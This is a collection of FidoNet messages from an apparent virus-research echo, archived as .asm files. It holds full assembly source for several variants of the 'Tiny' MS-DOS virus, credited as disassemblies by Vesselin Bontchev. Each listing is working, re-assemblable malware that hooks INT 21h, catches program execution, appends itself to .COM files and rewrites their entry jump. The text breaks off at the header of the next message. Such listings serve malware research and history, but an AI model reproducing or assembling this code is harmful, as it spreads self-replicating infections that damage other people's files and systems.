mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
mov al,0
call lseek
mov ah,3F ; Read the first 4 bytes of the file
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov al,0 ; Seek to the file beginning
call lseek
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dh,6 ; Put 6 in DH and 4 in CL
mov cl,4
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Miami Beach BBS - Nijmegen Nl - 080-732083 - ZyX 19K2 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/m# Allow # multiple passes to resolve forward references
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

210
MSDOS/Virus.MSDOS.Unknown.vir23.asm Normal file
View File

@ -0,0 +1,210 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 13 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_158.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Bill Dirks, 2:283/718 (06 Nov 94 16:32)
;* To : Gilbert Holleman
;* Subj : TINY_158.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Bill.Dirks@f718.n283.z2.fidonet.org
page ,132
name TINY158
title The 'Tiny' virus, version TINY-158
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-158 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- FastEcho/386 1.41.b7/Real
; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/a,/s Alphabetic or Source-code segment ordering
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

210
MSDOS/Virus.MSDOS.Unknown.vir24.asm Normal file
View File

@ -0,0 +1,210 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 14 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_159.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:32)
;* To : Viral Doctor
;* Subj : TINY_159.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org
page ,132
name TINY159
title The 'Tiny' virus, version TINY-159
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-159 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
xchg ax,cx
test ax,ax
jz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- FidoPCB v1.4 [NR]
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/m# Allow # multiple passes to resolve forward references
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

209
MSDOS/Virus.MSDOS.Unknown.vir25.asm Normal file
View File

@ -0,0 +1,209 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 15 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_167.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:34)
;* To : Viral Doctor
;* Subj : TINY_167.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
page ,132
name TINY167
title The 'Tiny' virus, version TINY-167
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-167 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
call v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
pop si ; Determine the start addres of the virus body
add si,[si-2]
; Save the original first 4 bytes of the infected file on the stack:
push word ptr ds:[si-4]
push word ptr ds:[si-2]
push ax ; Save AX (to keep programs as DISKCOPY happy)
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
mov di,offset start ; Point DI at program start
pop ax ; Restore AX
pop word ptr ds:[di+2] ; Restore the original first 4 bytes
pop word ptr ds:[di] ; of the file
push ds ; ES := DS
pop es
jmp di ; Go
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E8 ; Near CALL opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the CALL's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- PPoint 1.86
; + Origin: <Rudy's Place - Israel> Hard disks never die... (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;Syntax: TASM [options] source [,object] [,listing] [,xref]
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

200
MSDOS/Virus.MSDOS.Unknown.vir26.asm Normal file
View File

@ -0,0 +1,200 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 16 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_138.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:34)
;* To : Fred Lee
;* Subj : TINY_138.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
page ,132
name TINY138
title The 'Tiny' virus, version TINY-138
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-138 ú
; ú Disassembled by Vesselin Bontchev, September 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
call do_int21
jc end_exec ; Exit on error
cbw ; Zero AH
cwd ; Zero DX
mov bx,si ; Save handle in BX
mov ds,ax ; Set DS and ES to 60h,
mov es,ax ; the virus data segment
mov ah,3F ; Read the first 4 bytes
int 69
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
mov al,'M' ; Look for `M'
repne scasb
jz close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek ; SI now contains the file size
mov cl,v_len ; Length of virus body
int 69 ; Append the virus to the file (AH is now 40h)
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
inc si ; Add 1 to file size for the JMP
xchg ax,si ; Move it in AX
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
xchg ax,dx ; Zero AX
call lseek ; Seek to the beginning
int 69 ; AH is 40h, write the JMP instruction
close:
mov ah,3E ; Close the file
int 69
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek:
mov ah,42 ; Seek operation
cwd ; Zero DX
do_int21:
xor cx,cx ; External entry for Open
int 69
mov cl,4 ; 4 bytes will be read/written
xchg ax,si ; Store AX in SI
mov ax,4060 ; Prepare AH for Write
xor di,di ; Zero DI
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
;-+- FMail 0.96â
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/A=NNNN Set NewExe segment alignment factor
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

195
MSDOS/Virus.MSDOS.Unknown.vir27.asm Normal file
View File

@ -0,0 +1,195 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 17 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
